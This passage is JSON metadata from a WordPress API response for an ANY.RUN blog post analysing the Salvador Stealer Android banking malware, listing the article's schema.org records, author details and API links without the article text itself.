reading time":"14 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/#article","isPartOf":{"@id":"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/"},"author":{"name":"Achmad Adhikara","@id":"https:\/\/any.run\/"},"headline":"Salvador Stealer: New Android Malware That Phishes Banking Details &amp; OTPs","datePublished":"2025-04-01T10:50:42+00:00","dateModified":"2025-04-02T05:49:54+00:00","mainEntityOfPage":{"@id":"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/"},"wordCount":2592,"commentCount":0,"publisher":{"@id":"https:\/\/any.run\/"},"keywords":["ANYRUN","cybersecurity","malware","malware analysis","malware behavior"],"articleSection":["Malware Analysis"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/","url":"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/","name":"Salvador Stealer: Analysis of New Mobile Banking Malware","isPartOf":{"@id":"https:\/\/any.run\/"},"datePublished":"2025-04-01T10:50:42+00:00","dateModified":"2025-04-02T05:49:54+00:00","description":"Discover detailed analysis of Salvador Stealer, a new Android malware targeting users of mobile banking 
apps.","breadcrumb":{"@id":"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/any.run\/cybersecurity-blog\/"},{"@type":"ListItem","position":2,"name":"Malware Analysis","item":"https:\/\/any.run\/cybersecurity-blog\/category\/malware-analysis\/"},{"@type":"ListItem","position":3,"name":"Salvador Stealer: New Android Malware That Phishes Banking Details &amp; OTPs"}]},{"@type":"WebSite","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/","name":"ANY.RUN&#039;s Cybersecurity Blog","description":"Cybersecurity Blog covers topics for experienced professionals as well as for those new to it.","publisher":{"@id":"https:\/\/any.run\/"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/any.run\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/any.run\/","name":"ANY.RUN","url":"https:\/\/any.run\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg","contentUrl":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg","width":1,"height":1,"caption":"ANY.RUN"},"image":{"@id":"https:\/\/any.run\/"},"sameAs":["https:\/\/www.facebook.com\/www.any.run\/","https:\/\/twitter.com\/anyrun_app","https:\/\/www.linkedin.com\/company\/30692044","https:\/\/www.youtube.com\/channel\/UCOgCPho7lzmH7m6fPNlukrQ"]},{"@type":"Person","@id":"https:\/\/any.run\/","name":"Achmad 
Adhikara","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/Adhikara-1.jpg","contentUrl":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/Adhikara-1.jpg","caption":"Achmad Adhikara"},"description":"Achmad Adhikara is a threat hunter at ANY.RUN. Former red teamer. I chase threats. I prefer to stay below periscope depth. fnord.","url":"#molongui-disabled-link"}]}},"_links":{"self":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/12413"}],"collection":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/comments?post=12413"}],"version-history":[{"count":84,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/12413\/revisions"}],"predecessor-version":[{"id":12525,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/12413\/revisions\/12525"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/media\/12493"}],"wp:attachment":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/media?parent=12413"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/categories?post=12413"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/tags?post=12413"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}